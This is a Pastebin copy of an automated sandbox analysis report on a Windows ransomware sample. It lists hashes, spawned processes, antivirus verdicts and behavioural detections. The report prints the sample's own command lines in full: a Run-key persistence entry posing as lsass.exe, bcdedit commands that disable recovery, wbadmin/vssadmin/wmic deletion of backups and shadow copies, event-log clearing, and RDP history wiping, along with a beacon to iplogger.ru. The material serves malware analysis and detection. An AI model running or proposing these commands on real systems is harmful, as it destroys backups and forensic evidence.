API tools faq
paste
Advertisement
paladin316

2303Exes_636d3c669e36510bf337fd2f1ea64732_tmp_2019-09-18_14_30.txt

paladin316
Sep 18th, 2019
1,339
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.02 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * ID: 2303
  3. * MalFamily: "Malicious"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
  8. * File Size: 435200
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
  11. * MD5: "636d3c669e36510bf337fd2f1ea64732"
  12. * SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
  13. * SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
  14. * CRC32: "D4F2AC3B"
  15. * SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
  16.  
  17. * Process Execution:
  18. "nH3pXIYjPPePo.exe",
  19. "cmd.exe",
  20. "reg.exe",
  21. "lsass.exe",
  22. "cmd.exe",
  23. "cmd.exe",
  24. "cmd.exe",
  25. "cmd.exe",
  26. "cmd.exe",
  27. "cmd.exe",
  28. "cmd.exe",
  29. "WMIC.exe",
  30. "cmd.exe",
  31. "vssadmin.exe",
  32. "cmd.exe",
  33. "reg.exe",
  34. "cmd.exe",
  35. "reg.exe",
  36. "cmd.exe",
  37. "reg.exe",
  38. "cmd.exe",
  39. "attrib.exe",
  40. "cmd.exe",
  41. "cmd.exe",
  42. "wevtutil.exe",
  43. "cmd.exe",
  44. "wevtutil.exe",
  45. "cmd.exe",
  46. "wevtutil.exe",
  47. "cmd.exe",
  48. "sc.exe",
  49. "lsass.exe",
  50. "lsass.exe",
  51. "cmd.exe",
  52. "PING.EXE",
  53. "services.exe",
  54. "svchost.exe",
  55. "WmiPrvSE.exe",
  56. "VSSVC.exe",
  57. "taskhost.exe",
  58. "WMIADAP.exe"
  59.  
  60.  
  61. * Executed Commands:
  62. "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
  63. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
  64. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
  65. "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
  66. "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
  67. "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
  68. "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
  69. "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
  70. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
  71. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
  72. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
  73. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
  74. "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
  75. "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
  76. "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
  77. "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
  78. "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
  79. "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
  80. "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
  81. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
  82. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
  83. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
  84. "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
  85. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
  86. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
  87. "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
  88. "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
  89. "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
  90. "C:\\Windows\\system32\\vssvc.exe",
  91. "vssadmin delete shadows /all /quiet",
  92. "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
  93. "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
  94. "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
  95. "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
  96. "wevtutil.exe clear-log Application",
  97. "wevtutil.exe clear-log Security",
  98. "wevtutil.exe clear-log System",
  99. "sc config eventlog start=disabled"
  100.  
  101.  
  102. * Signatures Detected:
  103.  
  104. "Description": "Behavioural detection: Executable code extraction",
  105. "Details":
  106.  
  107.  
  108. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  109. "Details":
  110.  
  111.  
  112. "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
  113. "Details":
  114.  
  115. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  116.  
  117.  
  118. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  119.  
  120.  
  121. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  122.  
  123.  
  124. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
  125.  
  126.  
  127. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
  128.  
  129.  
  130. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
  131.  
  132.  
  133. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
  134.  
  135.  
  136. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  137.  
  138.  
  139. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
  140.  
  141.  
  142. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  143.  
  144.  
  145. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  146.  
  147.  
  148. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  149.  
  150.  
  151. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
  152.  
  153.  
  154. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
  155.  
  156.  
  157. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  158.  
  159.  
  160. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  161.  
  162.  
  163. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  164.  
  165.  
  166. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
  167.  
  168.  
  169.  
  170.  
  171. "Description": "Creates RWX memory",
  172. "Details":
  173.  
  174.  
  175. "Description": "Possible date expiration check, exits too soon after checking local time",
  176. "Details":
  177.  
  178. "process": "nH3pXIYjPPePo.exe, PID 2244"
  179.  
  180.  
  181.  
  182.  
  183. "Description": "A process attempted to delay the analysis task.",
  184. "Details":
  185.  
  186. "Process": "WmiPrvSE.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
  187.  
  188.  
  189.  
  190.  
  191. "Description": "Performs HTTP requests potentially not found in PCAP.",
  192. "Details":
  193.  
  194. "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
  195.  
  196.  
  197.  
  198.  
  199. "Description": "A process created a hidden window",
  200. "Details":
  201.  
  202. "Process": "nH3pXIYjPPePo.exe -> C:\\Windows\\System32\\cmd.exe"
  203.  
  204.  
  205.  
  206.  
  207. "Description": "Executed a command line with /V argument which modifies variable behaviour and whitespace allowing for increased obfuscation options",
  208. "Details":
  209.  
  210. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  211.  
  212.  
  213.  
  214.  
  215. "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
  216. "Details":
  217.  
  218. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  219.  
  220.  
  221.  
  222.  
  223. "Description": "Drops a binary and executes it",
  224. "Details":
  225.  
  226. "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
  227.  
  228.  
  229.  
  230.  
  231. "Description": "A ping command was executed with the -n argument possibly to delay analysis",
  232. "Details":
  233.  
  234. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  235.  
  236.  
  237. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  238.  
  239.  
  240. "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
  241.  
  242.  
  243.  
  244.  
  245. "Description": "Uses Windows utilities for basic functionality",
  246. "Details":
  247.  
  248. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  249.  
  250.  
  251. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  252.  
  253.  
  254. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  255.  
  256.  
  257. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  258.  
  259.  
  260. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  261.  
  262.  
  263. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  264.  
  265.  
  266. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  267.  
  268.  
  269. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  270.  
  271.  
  272. "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  273.  
  274.  
  275. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  276.  
  277.  
  278. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  279.  
  280.  
  281. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  282.  
  283.  
  284. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  285.  
  286.  
  287. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
  288.  
  289.  
  290. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
  291.  
  292.  
  293. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
  294.  
  295.  
  296. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
  297.  
  298.  
  299. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  300.  
  301.  
  302. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  303.  
  304.  
  305. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  306.  
  307.  
  308. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
  309.  
  310.  
  311. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  312.  
  313.  
  314. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  315.  
  316.  
  317. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  318.  
  319.  
  320. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  321.  
  322.  
  323. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  324.  
  325.  
  326. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  327.  
  328.  
  329. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  330.  
  331.  
  332. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  333.  
  334.  
  335. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  336.  
  337.  
  338. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
  339.  
  340.  
  341. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
  342.  
  343.  
  344. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
  345.  
  346.  
  347. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  348.  
  349.  
  350. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  351.  
  352.  
  353. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  354.  
  355.  
  356. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
  357.  
  358.  
  359. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
  360.  
  361.  
  362. "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
  363.  
  364.  
  365. "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
  366.  
  367.  
  368. "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
  369.  
  370.  
  371. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  372.  
  373.  
  374. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  375.  
  376.  
  377. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  378.  
  379.  
  380. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  381.  
  382.  
  383. "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  384.  
  385.  
  386. "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  387.  
  388.  
  389. "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
  390.  
  391.  
  392. "command": "sc config eventlog start=disabled"
  393.  
  394.  
  395.  
  396.  
  397. "Description": "Attempts to delete volume shadow copies",
  398. "Details":
  399.  
  400.  
  401. "Description": "Deletes its original binary from disk",
  402. "Details":
  403.  
  404.  
  405. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  406. "Details":
  407.  
  408. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 126917 times"
  409.  
  410.  
  411.  
  412.  
  413. "Description": "Modifies boot configuration settings",
  414. "Details":
  415.  
  416. "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
  417.  
  418.  
  419. "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
  420.  
  421.  
  422.  
  423.  
  424. "Description": "A system process is generating network traffic likely as a result of process injection",
  425. "Details":
  426.  
  427. "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
  428.  
  429.  
  430. "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
  431.  
  432.  
  433.  
  434.  
  435. "Description": "Installs itself for autorun at Windows startup",
  436. "Details":
  437.  
  438. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
  439.  
  440.  
  441. "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
  442.  
  443.  
  444.  
  445.  
  446. "Description": "Writes a potential ransom message to disk",
  447. "Details":
  448.  
  449. "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
  450.  
  451.  
  452.  
  453.  
  454. "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
  455. "Details":
  456.  
  457. "Cylance": "Unsafe"
  458.  
  459.  
  460. "CrowdStrike": "win/malicious_confidence_100% (D)"
  461.  
  462.  
  463. "Symantec": "ML.Attribute.HighConfidence"
  464.  
  465.  
  466. "APEX": "Malicious"
  467.  
  468.  
  469. "Endgame": "malicious (high confidence)"
  470.  
  471.  
  472. "Invincea": "heuristic"
  473.  
  474.  
  475. "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
  476.  
  477.  
  478. "FireEye": "Generic.mg.636d3c669e36510b"
  479.  
  480.  
  481. "SentinelOne": "DFI - Malicious PE"
  482.  
  483.  
  484. "Microsoft": "Trojan:Win32/Suloc.A"
  485.  
  486.  
  487. "Acronis": "suspicious"
  488.  
  489.  
  490. "VBA32": "Malware-Cryptor.General.3"
  491.  
  492.  
  493. "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
  494.  
  495.  
  496. "Cybereason": "malicious.5d1a74"
  497.  
  498.  
  499. "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
  500.  
  501.  
  502.  
  503.  
  504. "Description": "Detects VirtualBox through the presence of a file",
  505. "Details":
  506.  
  507. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
  508.  
  509.  
  510. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
  511.  
  512.  
  513. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
  514.  
  515.  
  516. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
  517.  
  518.  
  519. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
  520.  
  521.  
  522. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
  523.  
  524.  
  525.  
  526.  
  527. "Description": "Clears Windows events or logs",
  528. "Details":
  529.  
  530. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  531.  
  532.  
  533. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  534.  
  535.  
  536. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  537.  
  538.  
  539. "command": "wevtutil.exe clear-log Application"
  540.  
  541.  
  542. "command": "wevtutil.exe clear-log Security"
  543.  
  544.  
  545. "command": "wevtutil.exe clear-log System"
  546.  
  547.  
  548.  
  549.  
  550. "Description": "Appears to use character obfuscation in a command line",
  551. "Details":
  552.  
  553. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  554.  
  555.  
  556.  
  557.  
  558. "Description": "Creates a copy of itself",
  559. "Details":
  560.  
  561. "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
  562.  
  563.  
  564.  
  565.  
  566. "Description": "Anomalous binary characteristics",
  567. "Details":
  568.  
  569. "anomaly": "Found duplicated section names"
  570.  
  571.  
  572.  
  573.  
  574. "Description": "Uses suspicious command line tools or Windows utilities",
  575. "Details":
  576.  
  577. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  578.  
  579.  
  580. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
  581.  
  582.  
  583. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  584.  
  585.  
  586. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  587.  
  588.  
  589. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
  590.  
  591.  
  592. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
  593.  
  594.  
  595. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
  596.  
  597.  
  598. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
  599.  
  600.  
  601. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
  602.  
  603.  
